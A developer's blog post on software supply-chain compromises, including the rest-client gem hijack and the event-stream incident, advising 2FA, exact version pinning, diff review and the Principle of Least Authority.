Compromised accounts, back doors, and automatically updating dependencies

Full article

Once again the dev community is reminded that although we sometimes imagine we're building one well-founded layer upon another, reality can be a bit more... sand castle at high tide. Basket of eggs. House of cards. ๐Ÿƒ๐Ÿƒ๐Ÿƒ

Several years ago, a developer got strong-armed into renaming his npm module, so he took his ball and went home, leaving thousands of projects in a broken state. Last year, a popular npm module called event-stream was handed off to an unknown "volunteer", who ended up not having the best of intentions (understatement).

And a week ago, the rest-client gem was updated with malicious code that, among other things, called out to a random pastebin file and executed the contents. It was pulled in by a thousand projects, before it was yanked a couple days ago and replaced with a clean version. This time, it was a developer's RubyGems account that was hacked, which gave the hacker access to update the gem. It happens.

This'll make the circuit through the dev community for awhile, but it's not the first time it's happened, and certainly won't be the last. Is there anything we can do?

Reasonable Precautions

Problems like these will likely always be a problem, and although nothing's foolproof it'd be stupid to say there's nothing we can do. Here's two that come to mind that likely would've prevented the RubyGems issue from happening at all...

Secure your code (by securing your accounts)

2FA should be enforced, not an option to enable. If someone guessed that dev's RubyGems password, they would've been unlikely to gain access if he'd also had 2FA enabled. In fact, especially in light of the recent git ransom campaign that hit compromised accounts across several repo platforms, our team at work decided to require 2FA for the whole organization. Here's more ways to secure GitHub too.

I have a number of browser extensions and a package on NuGet, between which there's a couple thousand users who'd be affected if my accounts were hacked and malicious code uploaded. NuGet packages don't auto-update by default, but most browsers do. You can easily enable 2FA for your Chrome, Firefox, Microsoft, RubyGems, and myriad other accounts. Doing so doesn't just protect you, but anyone using your code too!

Don't automatically update third-party dependencies

Visual Studio won't (afaik) update NuGet packages automatically during the build process, but build tools for other languages do.

In Erlang, for example, rebar3 provides several ways to specify which version to grab. Of all the following, specifying the exact commit (ref) you're interested in is the safest way to go. That commit represents a snapshot in time that won't change with further changes.

{deps, [
    rebar,  % latest version of package
    {rebar, "1.0.0"},
    {rebar, {git, "", {branch, "master"}}},
    {rebar, {git, "", {tag, "1.0.0"}}},
    {rebar, {git, "", {ref, "7f73b8d6"}}}

Similarly in Ruby, bundler's gemfile provides several ways to specify versions too. Of the following, the optimistic version constraint >=1.0 is the least secure. The pessimistic constraint ~>1.1 isn't much better. In fact, those thousand people affected by the rest-client hack could've had ~>1.6.12 and still been affected. If they knew they wanted that particular legacy version, they could have specified '1.6.12'.

gem 'nokogiri'
gem 'rails', '3.0.0.beta3'
gem 'rack',  '>=1.0'
gem 'thin',  '~>1.1'

No matter what language or build tool you're using, the best thing you could do is check out the source for a project you want to use so that you're reasonably sure it's doing what it's supposed to do, and then lock your project that depends on it to that specific version. Updating to a newer version should be a deliberate, conscientious action, not a roll of the dice.

Inspect updates to third-party dependencies

No one can expect a joe-regular browser user to inspect their extensions before updating them, even if there were a way to disable automatic updates. But we devs are paid to understand this stuff, and to protect the end-user from bad code. Luckily, Jussi Koljonen did just that when he noticed the compromised update in the Ruby gem the other day. Would you or I? Maybe, maybe not.

Following on the heels of targeting a single version of a dependency, when you do decide to target a newer version, it'd be a good idea to check out the differences. If it's a big change, it might not be reasonable to understand everything, but I think looking at a git diff most of us would see a new piece of code that's loading an external file and executing the contents.

Reasonable Solutions

None of the above are foolproof solutions.. just reasonable precautions to take. Even if you follow those and all the other advice you'll find online, there are no guarantees. 2FA won't save you if GitHub or RubyGems is hacked. Inspecting the code won't help if it's minified, obfuscated, or so complex that it's nearly impossible to decipher anyway.

When it comes to natural disasters, like tornadoes and earthquakes and hurricanes, no one talks about stopping them. You take precautions - board up windows, move to the center of a building, don't wave a golf club over your head in a storm. You can play it smart, but the reality is that you can't stop everything. Mitigate them. Lessen the damage. I think that's the same solution here.

Principle of Least Authority (POLA)

There's a concept, called the Principle of Least Authority (POLA), which we already use in browser extensions and mobile devices, but it hasn't been adopted everywhere, and even where it has it hasn't necessarily been implemented well. Basically, if rest-client didn't have a reason to retrieve and execute remote files, the malicious code injected into it shouldn't have been able to do it either... at least, not without somehow prompting the consumer to allow more privileges, which likely would have raised red flags.

Check out POLA Today Keeps the Virus at Bay by Alan Karp for a good introduction. If you prefer videos, check out the talk Alan gave at Google, posted below.

A suitable flaw in any piece of software, written by Microsoft or anyone else, can be used to grant an attacker all the privileges of the user. Reducing the number of such flaws will make finding points of attack harder, but once one is found, it is likely to be exploited. The mistake is in asking โ€How can we prevent attacks?โ€ when we should be asking โ€How can we limit the damage that can be done when an attack succeeds?โ€. The former assumes infallibility; the latter recognizes that building systems is a human process.

Then check out POLA Would Have Prevented the Event-Stream Incident. The comments are worth reading too. It's the first time I've heard the term POLA, even though I've used it before. I never considered how it could be extended to the apps we develop, to the OS's we use, etc. Now I want to investigate some of the things Alan mentions in his talk, like the E programming language and a virus safe (not necessarily virus-free!) computing environment.

At the end of the day, it's a shame we have to jump through these hoops at all. It's not enough to have a curiosity of how things work - it needs to be focused correctly. Some people create things, because creating is fulfilling. Others destroy things, just because they can.


Grant Winney

I write when I've got something to share - a personal project, a solution to a difficult problem, or just an idea. We learn by doing and sharing. We've all got something to contribute.

Comments / Reactions